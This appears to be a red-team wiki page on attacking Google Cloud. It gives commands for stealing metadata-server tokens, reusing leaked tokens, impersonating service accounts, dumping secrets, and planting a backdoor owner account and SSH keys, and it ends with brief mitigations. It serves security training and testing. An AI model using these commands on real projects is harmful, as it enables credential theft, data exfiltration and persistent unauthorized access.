GCP

This playbook outlines offensive security techniques in Google Cloud Platform (GCP). It is structured around the red teaming lifecycle: reconnaissance, exploitation, privilege escalation, lateral move

1. GCP Cloud Overview

Core Components

Google Cloud IAM – Identity and Access Management (users, service accounts, roles, policies).
Projects – Organizational units that contain resources.
Service Accounts – Identities for workloads (VMs, functions, apps).
Cloud Resource Hierarchy – Org → Folders → Projects → Resources.

Planes of Access

Control Plane – Google Cloud Console, Cloud SDK (gcloud), REST APIs.
Data Plane – Actual workloads (VMs, buckets, databases).

🔑 Security Insight:

Compromise of Control Plane creds = full takeover.
Compromise of Service Account = privilege within project scope (but often escalatable).

2. Authentication & Credential Types

2.1 User Accounts

Human users with Google identities ([email protected], [email protected]).

2.2 Service Accounts

Non-human principals for apps/VMs.
Auth via JSON key files or Metadata Server.

2.3 Access Tokens

OAuth2 bearer tokens (short-lived).
Commonly abused via SSRF → metadata server.

Get token inside VM

curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

3. Enumeration

3.1 Identity Enumeration

Check current active account:

gcloud auth list

Get project ID:

gcloud config get-value project

List IAM policy for a project:

gcloud projects get-iam-policy <project-id> --format=json

Find specific service account roles:

gcloud projects get-iam-policy <project-id> --format=json \
  | jq '.bindings[] | select(.members[] | contains("serviceAccount:dev-sa@<project>.iam.gserviceaccount.com")) | .role'

3.2 Service Account Enumeration

List all service accounts in a project:

gcloud iam service-accounts list --project <project-id>

Get details about a service account:

gcloud iam service-accounts describe <sa-name>@<project>.iam.gserviceaccount.com

List keys associated with a service account:

gcloud iam service-accounts keys list --iam-account <sa-name>@<project>.iam.gserviceaccount.com

3.3 Storage Enumeration

List storage buckets:

gcloud storage buckets list --project <project-id>

List objects in a bucket:

gcloud storage objects list gs://<bucket-name>

Download file from bucket:

gcloud storage cp gs://<bucket-name>/<object> ./localfile

4. Exploitation

4.1 Metadata Service Abuse (IMDS Equivalent)

Inside a VM, access metadata endpoint:

curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

Use the token to authenticate:

export ACCESS_TOKEN=$(curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google" | jq -r .access_token)

gcloud auth activate-access-token $ACCESS_TOKEN

4.2 Using Leaked Tokens

If attacker has a token (e.g., from logs, SSRF):

echo "<token>" > token.txt
gcloud auth activate-access-token $(cat token.txt)

Example (from CTF-like scenario):

gcloud projects get-iam-policy <project-id> --format=json --access-token-file token.txt

4.3 Privilege Escalation via Service Accounts

If SA has roles like roles/iam.serviceAccountUser or roles/editor, attacker can impersonate or escalate:

gcloud auth print-access-token --impersonate-service-account=<target-sa>@<project>.iam.gserviceaccount.com

5. Post-Exploitation

5.1 Key Vaults / Secrets

If Cloud KMS or Secret Manager accessible:

gcloud secrets list --project <project-id>
gcloud secrets versions access latest --secret=<secret-name> --project <project-id>

5.2 BigQuery Data Dumping

gcloud bigquery datasets list --project <project-id>
gcloud bigquery tables list --dataset_id <dataset>
gcloud bigquery tables describe <dataset>.<table>

6. Lateral Movement

Use compromised service account to pivot into other projects.
Enumerate organization-level roles:

gcloud organizations get-iam-policy <org-id> --format=json

Abuse roles like roles/resourcemanager.folderViewer, roles/resourcemanager.projectMover for movement.

7. Persistence

Create new service account and assign roles:

gcloud iam service-accounts create attacker-sa --display-name "Backdoor"
gcloud projects add-iam-policy-binding <project-id> \
  --member="serviceAccount:attacker-sa@<project-id>.iam.gserviceaccount.com" \
  --role="roles/owner"

Add SSH key to compromised VM instance:

gcloud compute instances add-metadata <vm-name> \
  --metadata ssh-keys="attacker:<public-key>"

8. Detection & Mitigation

Monitor IAM policy changes (Cloud Audit Logs).
Restrict service account privileges (principle of least privilege).
Restrict metadata access (firewall, no public SSRF exposure).
Rotate keys/tokens frequently.
Enable VPC Service Controls to limit lateral movement.

PreviousAWS NextAzure

Last updated 5 months ago

hashtag1. GCP Cloud Overview

hashtagCore Components

hashtagPlanes of Access

hashtag2. Authentication & Credential Types

hashtag2.1 User Accounts

hashtag2.2 Service Accounts

hashtag2.3 Access Tokens

hashtag3. Enumeration

hashtag3.1 Identity Enumeration

hashtag3.2 Service Account Enumeration

hashtag3.3 Storage Enumeration

hashtag4. Exploitation

hashtag4.1 Metadata Service Abuse (IMDS Equivalent)

hashtag4.2 Using Leaked Tokens

hashtag4.3 Privilege Escalation via Service Accounts

hashtag5. Post-Exploitation

hashtag5.1 Key Vaults / Secrets

hashtag5.2 BigQuery Data Dumping

hashtag6. Lateral Movement

hashtag7. Persistence

hashtag8. Detection & Mitigation